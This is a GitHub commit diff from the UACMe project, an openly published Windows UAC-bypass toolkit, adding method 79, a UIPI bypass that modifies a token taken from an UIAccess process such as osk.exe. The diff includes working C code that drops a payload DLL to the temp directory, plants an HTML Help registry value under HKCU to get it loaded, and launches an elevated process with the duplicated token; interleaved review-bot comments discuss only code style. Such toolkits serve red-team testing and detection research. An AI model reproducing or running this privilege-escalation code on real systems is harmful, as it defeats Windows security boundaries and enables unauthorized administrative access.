Method 79 added;
Readme updated.
hfiref0x committed Apr 8, 2024
1 parent 90cb9bc commit 6e36b58
Showing 21 changed files with 387 additions and 69 deletions.
2 changes: 1 addition & 1 deletion LICENSE.md
@@ -1,4 +1,4 @@
Copyright (c) 2014 - 2023, UACMe Project
Copyright (c) 2014 - 2024, UACMe Project

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
13 changes: 12 additions & 1 deletion README.md
Expand Up @@ -804,6 +804,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.5
79. Author: James Forshaw and Stefan Kanthak
* Type: GUI Hack
* Method: UIPI bypass with token modification
* Target(s): \system32\osk.exe, \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmTokenModUIAccessMethod2
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.6

</details>

Expand Down Expand Up @@ -916,9 +926,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944
* Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html
* Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html
* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html

# Authors

(c) 2014 - 2023 UACMe Project
(c) 2014 - 2024 UACMe Project

[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
Binary file modified Source/Akagi/Resource.rc
Binary file not shown.
19 changes: 13 additions & 6 deletions Source/Akagi/methods/methods.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2023
* (C) COPYRIGHT AUTHORS, 2015 - 2024
*
* TITLE: METHODS.C
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 22 Sep 2023
* DATE: 03 Apr 2024
*
* UAC bypass dispatch.
*
Expand Down Expand Up @@ -149,7 +149,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
{ MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE }
{ MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};

/*
Expand Down Expand Up @@ -582,8 +583,14 @@ UCM_API(MethodShellSdctl)

UCM_API(MethodTokenModUIAccess)
{
return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
Parameter->PayloadSize);
if (Parameter->Method == UacMethodTokenModUiAccess) {
return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
Parameter->PayloadSize);
}
else {
return ucmTokenModUIAccessMethod2(Parameter->PayloadCode,
Parameter->PayloadSize);
}
}

UCM_API(MethodEditionUpgradeManager)
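Review bot: The new dispatch entry `{ MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }` declares a Windows 10 19H1 minimum for method 79, while the README entry added in this same commit says `Works from: Windows 7 (7600)`; one of the two should be corrected so the table and the documentation agree (presumably the table value is what the dispatcher enforces, but that check is outside this hunk). In `MethodTokenModUIAccess`, the `else` branch routes every method value other than `UacMethodTokenModUiAccess` to `ucmTokenModUIAccessMethod2`, so a future entry mapped to this handler would silently take the second path; comparing explicitly, `else if (Parameter->Method == UacMethodTokenModUiAccess2)`, with a final `return STATUS_INVALID_PARAMETER;` would make the mapping self-checking. A one-line comment above the `if` stating that both methods 78 and 79 share this entry point would also help a reader of the table.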
7 changes: 4 additions & 3 deletions Source/Akagi/methods/methods.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2023
* (C) COPYRIGHT AUTHORS, 2014 - 2024
*
* TITLE: METHODS.H
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 22 Sep 2023
* DATE: 03 Apr 2024
*
* Prototypes and definitions for UAC bypass methods table.
*
Expand Down Expand Up @@ -98,6 +98,7 @@ typedef enum _UCM_METHOD {
UacMethodIscsiCpl, //+
UacMethodAtlHijack, //+
UacMethodSspiDatagram, //+
UacMethodTokenModUiAccess2, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
10 changes: 7 additions & 3 deletions Source/Akagi/methods/routines.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2023
* (C) COPYRIGHT AUTHORS, 2014 - 2024
*
* TITLE: ROUTINES.H
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 22 Sep 2023
* DATE: 03 Apr 2024
*
* Prototypes of methods for UAC bypass methods table.
*
Expand Down Expand Up @@ -145,6 +145,10 @@ NTSTATUS ucmTokenModUIAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmTokenModUIAccessMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmDebugObjectMethod(
_In_ LPWSTR lpszPayload);

111 changes: 99 additions & 12 deletions Source/Akagi/methods/tyranid.c
Expand Up @@ -176,7 +176,9 @@ NTSTATUS ucmDiskCleanupEnvironmentVariable(
*/
BOOL ucmxTokenModUIAccessMethodInitPhase(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
_In_ DWORD ProxyDllSize,
_In_ LPCSTR EntryPointName,
_In_ LPCWSTR PayloadFileName
)
{
BOOL bResult = FALSE;
Expand All @@ -188,32 +190,35 @@ BOOL ucmxTokenModUIAccessMethodInitPhase(
//
if (supReplaceDllEntryPoint(ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS2,
EntryPointName,
TRUE))
{
//
// Drop modified Fubuki to the %temp%
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);
_strcat(szBuffer, PayloadFileName);
bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize);
}

return bResult;
}

/*
* ucmTokenModUIAccessMethod
* ucmxTokenModUIAccessExec
*
* Purpose:
*
* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod(
NTSTATUS ucmxTokenModUIAccessExec(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
_In_ DWORD ProxyDllSize,
_In_ LPCSTR EntryPointName,
_In_ LPCWSTR PayloadFileName,
_In_ UCM_METHOD Method
)
{
NTSTATUS Status = STATUS_ACCESS_DENIED;
Expand All @@ -236,8 +241,13 @@ NTSTATUS ucmTokenModUIAccessMethod(
//
// Tweak and drop payload to %temp%.
//
if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll, ProxyDllSize))
if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll,
ProxyDllSize,
EntryPointName,
PayloadFileName))
{
break;
}

//
// Spawn OSK.exe process.
Expand Down Expand Up @@ -308,10 +318,12 @@ NTSTATUS ucmTokenModUIAccessMethod(
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);

if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
if (Method == UacMethodTokenModUiAccess) {
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
}

if (CreateProcessAsUser(hDupToken,
szBuffer, //application
Expand Down Expand Up @@ -346,12 +358,87 @@ NTSTATUS ucmTokenModUIAccessMethod(
if (pIntegritySid) RtlFreeSid(pIntegritySid);

_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);
_strcat(szBuffer, PayloadFileName);
DeleteFile(szBuffer);

return Status;
}

/*
* ucmTokenModUIAccessMethod
*
* Purpose:
*
* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE,
UacMethodTokenModUiAccess);
}

/*
* ucmTokenModUIAccessMethod2
*
* Purpose:
*
* Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
HKEY hKey;
LRESULT lResult;
NTSTATUS Status = STATUS_ACCESS_DENIED;
SIZE_T sz;
WCHAR szPayload[MAX_PATH * 2];

_strcpy(szPayload, g_ctx->szTempDirectory);
_strcat(szPayload, THEOLDNEWTHING);
_strcat(szPayload, TEXT(".dll"));

if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) {

hKey = NULL;
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lResult == ERROR_SUCCESS) {

sz = (1 + _strlen(szPayload)) * sizeof(WCHAR);
lResult = RegSetValueEx(hKey,
T_LOCATION,
0,
REG_SZ,
(BYTE*)szPayload,
(DWORD)sz);

if (lResult == ERROR_SUCCESS) {

Status = ucmxTokenModUIAccessExec(ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS3,
PKGMGR_EXE,
UacMethodTokenModUiAccess2);

}

RegCloseKey(hKey);
}

RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR);
DeleteFile(szPayload);
}
return Status;
}

/*
* ucmxCreateProcessFromParent
*
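Review bot: `lResult` in `ucmTokenModUIAccessMethod2` is declared `LRESULT`, but `RegCreateKeyEx` and `RegSetValueEx` return `LSTATUS`; `LSTATUS lResult;` matches the API and avoids holding a 32-bit error code in a pointer-sized type. The header comment of the new function says only that it is a variant of the UIAccess bypass and does not document its side effects, which a maintainer needs to know: it writes the `T_LOCATION` value under `HKEY_CURRENT_USER` at `T_HTMLHELP_AUTHOR`, drops a file named from `THEOLDNEWTHING` into the temp directory, and removes both before returning, with the `RegDeleteKey` and `DeleteFile` results deliberately ignored — a `Side effects:` paragraph stating this would make the cleanup contract explicit. In `ucmxTokenModUIAccessExec`, `lpszPayload` is now assigned only when `Method == UacMethodTokenModUiAccess`; its initialisation is outside the hunk, so confirm it holds a defined value (presumably NULL) on the other path before it reaches `CreateProcessAsUser`. The body of `ucmxTokenModUIAccessExec` starts and ends outside the hunks shown.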
8 changes: 4 additions & 4 deletions Source/Akagi/methods/zcgonvh.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2023
* (C) COPYRIGHT AUTHORS, 2020 - 2024
*
* TITLE: ZCGONVH.C
*
* VERSION: 3.63
* VERSION: 3.66
*
* DATE: 11 Jan 2023
* DATE: 03 Apr 2024
*
* UAC bypass methods based on zcgonvh original work.
*
Expand Down Expand Up @@ -471,7 +471,7 @@ HRESULT ucmxTriggerDiagProfile(
} while (FALSE);

if (methodName)
SysFreeString(methodName);
SysFreeString((BSTR)methodName);

if (pDispatch) {
pDispatch->lpVtbl->Release(pDispatch);
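Review bot: The `(BSTR)` cast added at `SysFreeString((BSTR)methodName);` suggests `methodName` is not declared as `BSTR`; if it was allocated with `SysAllocString`, the cleaner fix is to declare it `BSTR` at its definition (outside this hunk) so the free site needs no cast and the compiler checks the type throughout. The enclosing `ucmxTriggerDiagProfile` starts before this hunk.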
12 changes: 8 additions & 4 deletions Source/Akagi/sup.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2023
* (C) COPYRIGHT AUTHORS, 2015 - 2024
*
* TITLE: SUP.C
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 25 Sep 2023
* DATE: 03 Apr 2024
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
Expand Down Expand Up @@ -2842,7 +2842,11 @@ NTSTATUS supWaitForGlobalCompletionEvent(
LARGE_INTEGER liDueTime;

if (g_ctx->SharedContext.hCompletionEvent) {
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(200000, 10000);
#ifdef _DEBUG
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);
#else
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(100000, 10000);
#endif
return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);
}

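Review bot: The two timeouts in `supWaitForGlobalCompletionEvent` are magic numbers whose unit is not stated; `UInt32x32To64(100000, 10000)` reads as 100000 ms expressed in 100-ns intervals, negated for a relative wait, and a comment at the `#ifdef _DEBUG`, e.g. `// relative NT due time in 100-ns units: 100 s release, 10 s debug`, would say so. Having release and debug builds wait for different lengths also means a timeout-dependent failure may reproduce in only one configuration; if the shorter debug wait exists purely for convenience, the comment should say that too. The function begins before this hunk.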
2 changes: 1 addition & 1 deletion Source/Akagi/uacme.vcxproj.user
Expand Up @@ -39,7 +39,7 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugConsole|x64'">
<LocalDebuggerCommandArguments>78</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>79</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
Binary file modified Source/Akatsuki/version.rc
Binary file not shown.